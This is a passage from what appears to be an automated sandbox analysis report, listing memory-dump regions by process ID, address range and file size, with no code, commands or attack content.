                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-2824-0x000000001DF30000-0x000000001DF38000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-2853-0x00007FFCF8C00000-0x00007FFCF96C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-871-0x0000000002CC0000-0x0000000002CCC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          48KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-0-0x0000000000A10000-0x0000000000AD0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          768KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-2792-0x000000001B800000-0x000000001B812000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-422-0x000000001D010000-0x000000001D156000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-294-0x00007FFCF8C00000-0x00007FFCF96C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-141-0x000000001BCB0000-0x000000001BCCE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-140-0x0000000001300000-0x000000000130C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          48KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-139-0x000000001CF90000-0x000000001D006000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          472KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-138-0x00007FFCF8C03000-0x00007FFCF8C05000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-53-0x00007FFCF8C00000-0x00007FFCF96C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1324-1-0x00007FFCF8C03000-0x00007FFCF8C05000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2797-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2806-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2703-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2682-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2791-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2854-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2794-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2704-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2798-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2802-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2805-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2856-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2858-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2844-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2825-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-2826-0x0000000000400000-0x0000000000454000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2664-2839-0x0000000000400000-0x0000000000474000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          464KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2664-2841-0x0000000000400000-0x0000000000474000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          464KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2664-2857-0x0000000000400000-0x0000000000474000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          464KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2664-903-0x000001D690120000-0x000001D690142000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2664-2859-0x0000000000400000-0x0000000000474000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          464KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3464-1378-0x000001AA893E0000-0x000001AA893EA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3464-1253-0x000001AA875E0000-0x000001AA87628000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          288KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3464-1344-0x000001AAA1E10000-0x000001AAA1E60000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          320KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3464-1379-0x000001AA89410000-0x000001AA89422000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          72KB